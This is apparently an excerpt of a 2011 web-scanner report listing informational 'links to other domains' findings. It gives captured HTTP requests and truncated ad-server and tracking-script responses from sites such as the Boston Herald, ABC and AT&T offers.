<td class="sps_1459307" style="height:12px;" nowrap="nowrap" align="right">
                                       &nbsp;<a href="http://tmz.sl.advertising.com/admin/advertisers/indexPl.jsp" target="_blank">
                                       
                                           Buy a link here
                                       
                                       </a>
...[SNIP]...

17.25. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adunit.cdn.auditude.com
Path:   /flash/modules/display/auditudeDisplayLib.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/modules/display/auditudeDisplayLib.js?callback=ndn.auditudeCallback&width=300&height=225&version=adunit-1.0&domain=auditude.com&zoneId=50832&mediaId=23408962&parentNode=auditudeContent&keyValues=dpid=90017;sitesection=bostonheraldentertain;sec=oth;sub=;wgt=1;width=300;height=225;url=http://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also&autoPlay=true&ndnR=1930&countdownMessage=Todays%20Top%20Videos%20available%20in%20{countdown} HTTP/1.1
Host: adunit.cdn.auditude.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/toppicks_bostonherald_ent.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Cache-Control: must-revalidate
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:02:47 GMT
ETag: "2736172791"
Expires: Sat, 17 Sep 2011 01:02:47 GMT
Last-Modified: Fri, 06 May 2011 17:05:19 GMT
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 11744

(function() {

   var PLAYER_SWF_URL = 'http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView';
   var AUD_SCRIPT_IDENTIFIER = 'auditudeDisplayLib.js';

   // Flash Player Version Detecti
...[SNIP]...
<td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white">' +
           '<span style="font-size:12px">
...[SNIP]...

17.26. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?l=1966491151&sz=728x90&wr=j&t=j&u=http%3A//ad.afy11.net/ad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D71897565%26rk1%3D2053665%26rk2%3D1316239421.077%26pt%3D0&r=http%3A//bostonherald.com/includes/processAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 01:20:34 GMT
Content-Length: 1472

document.write('<div style="z-index:10; position:relative; width:728px">'+'<a href="http://clk.specificclick.net/click/v=5;m=2;l=454;c=179530;b=1063955;ts=20110916212034;dct=http://www.bostonreedcollege.com/health-record-training.cfm" target="_blank" rel="nofollow"><img src="http://cache.specificmedia.com/creative/AKZF00146152.gif" border="0" width="728" height="90" /></a>'+'<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=179530&bid=1063955&lid=454" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110916212034&cmxid=2101.020017953001063955xmc" style="display: none" height="1" width="1" border="0" />');var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=454&campId=179530"></script>
...[SNIP]...

17.27. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?l=1966491151&sz=728x90&wr=j&t=j&u=http%3A//ad.afy11.net/ad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D94360478%26rk1%3D27348771%26rk2%3D1316239454.886%26pt%3D0&r=http%3A//bostonherald.com/includes/processAds.bg%3Fposition%3DBottom%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fstar_tracks%252Farticle HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=94360478&rk1=27348771&rk2=1316239454.886&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=4e7b93d56fbdc433b39cc593f969

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 01:24:04 GMT
Content-Length: 1472

document.write('<div style="z-index:10; position:relative; width:728px">'+'<a href="http://clk.specificclick.net/click/v=5;m=2;l=454;c=179530;b=1063955;ts=20110916212404;dct=http://www.bostonreedcollege.com/health-record-training.cfm" target="_blank" rel="nofollow"><img src="http://cache.specificmedia.com/creative/AKZF00146152.gif" border="0" width="728" height="90" /></a>'+'<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=179530&bid=1063955&lid=454" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110916212404&cmxid=2101.020017953001063955xmc" style="display: none" height="1" width="1" border="0" />');var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=454&campId=179530"></script>
...[SNIP]...

17.28. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?l=1966491151&sz=728x90&wr=j&t=j&u=http%3A//ad.afy11.net/ad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D57558110%26rk1%3D25841281%26rk2%3D1316239702.554%26pt%3D0&r=http%3A//bostonherald.com/includes/processAds.bg%3Fposition%3DBottom%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Finside_track%252Farticle HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=4e7b93d56fbdc433b39cc593f969

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=4ec01f0c7202511a265d88b8398f; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1472

document.write('<div style="z-index:10; position:relative; width:728px">'+'<a href="http://clk.specificclick.net/click/v=5;m=2;l=454;c=179530;b=1063955;ts=20110916210656;dct=http://www.bostonreedcollege.com/health-record-training.cfm" target="_blank" rel="nofollow"><img src="http://cache.specificmedia.com/creative/AKZF00146152.gif" border="0" width="728" height="90" /></a>'+'<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=179530&bid=1063955&lid=454" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110916210656&cmxid=2101.020017953001063955xmc" style="display: none" height="1" width="1" border="0" />');var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=454&campId=179530"></script>
...[SNIP]...

17.29. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=93093&u=http%3A%2F%2Fbeta.abc.go.com%2Fshows%2Fcharlies-angels&a=4&id=203928273&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Rectangles-Remnant&url=/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Sat, 17 Sep 2011 01:02:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:02:47 GMT
Content-Length: 268
Connection: close

document.write('<iframe src="http://ad.doubleclick.net/adi/N5776.126265.CASALEMEDIA/B5644942.9;sz=300x250;click0=http://c.casalemedia.com/c/4/1/84667/;ord=3485916816" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

17.30. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=93093&u=http%3A%2F%2Fbeta.abc.go.com%2Fshows%2Fcharlies-angels%2Fbios%2Feve-french&a=2&id=214553029&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Sat, 17 Sep 2011 00:58:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 00:58:08 GMT
Content-Length: 291
Connection: close

document.write('<iframe src="http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

17.31. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=93093&u=http%3A%2F%2Fbeta.abc.go.com%2Fshows%2Fcharlies-angels%2Fbios&a=4&id=212233394&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Rectangles-Remnant&url=/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Sat, 17 Sep 2011 00:57:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 00:57:59 GMT
Content-Length: 179
Connection: close

document.write('<iframe src="http://cdn.optmd.com/V2/80181/197812/index.html" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');

17.32. http://as1.suitesmart.com/99917/G15493.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /99917/G15493.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /99917/G15493.js?GID=15493 HTTP/1.1
Host: as1.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G15493=C1S99917-2-0-0-0-1315313090-0; G14853=C1S98373-1-0-0-0-1315398787-0

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 17 Aug 2011 22:50:01 GMT
ETag: "50ff5-e42-4aabb50f9d840"
Accept-Ranges: bytes
Content-Length: 3650
Content-Type: application/x-javascript
Date: Sat, 17 Sep 2011 00:52:07 GMT
Connection: close
Cache-Control: no-store

var _fSet={red:{15493 : 0},map:{},tgi:null,pnp:{},pix:0};function _FGet(){var jTags=document.getElementsByTagName('script');var jTag=jTags[jTags.length-1];var isFTG=(jTag.src.match(/suitesmart.*\/[0-9
...[SNIP]...
;this.no5e=this.tP['NO5']?this.tP['NO5']:0;}function _FtG5(s,g){var o=document.createElement('DIV');o.style.width='0px';o.style.height='0px';o.display='inline';o.style.position='absolute';o.innerHTML='<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="0" HEIGHT="0" id="_f5e"> <PARAM NAME="movie" VALUE="'+s+'/_f5e.swf">
...[SNIP]...

17.33. http://attuverseoffers.com/tv_hsi_bundles/includes/xml/offersS20.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attuverseoffers.com
Path:   /tv_hsi_bundles/includes/xml/offersS20.xml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tv_hsi_bundles/includes/xml/offersS20.xml?_=1316239558356 HTTP/1.1
Host: attuverseoffers.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_referrer_cache=http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%3Bwi.728%3Bhi.90%3Bai.236941493%3Bct.1%2F01; ee612e29-9b27-4ec8-bbf8-759478dd3755=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%3Bwi.728%3Bhi.90%3Bai.236941493%3Bct.1%2F01%22%2C%22id%22%3A%229Lm6uVSxV_u%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; __utma=213081156.1016926268.1316239558.1316239558.1316239558.1; __utmb=213081156.1.10.1316239558; __utmc=213081156; __utmz=213081156.1316239558.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 27 Jul 2011 19:08:18 GMT
Accept-Ranges: bytes
ETag: "8432538b904ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:41:20 GMT
Content-Length: 58695

<?xml version="1.0" encoding="iso-8859-1"?>
<offersList>
   <offer id="0" startDate="June 25, 2011" endDate="June 30, 2011">
       <xS20HeroOffer>images/heroOffer20State_cb150.png</xS20HeroOffer>
       <xS20Her
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
for cash withdrawal at ATMs. Card may not be used to purchase AT&T products and/or services in certain states. Card expires 90 days after issuance. For cardholder agreement/terms and conditions go to <a href="http://rewardcenter.att.com/myrewardcard/agreement.pdf" target="_blank">http://rewardcenter.att.com/myrewardcard/agreement.pdf</a>
...[SNIP]...
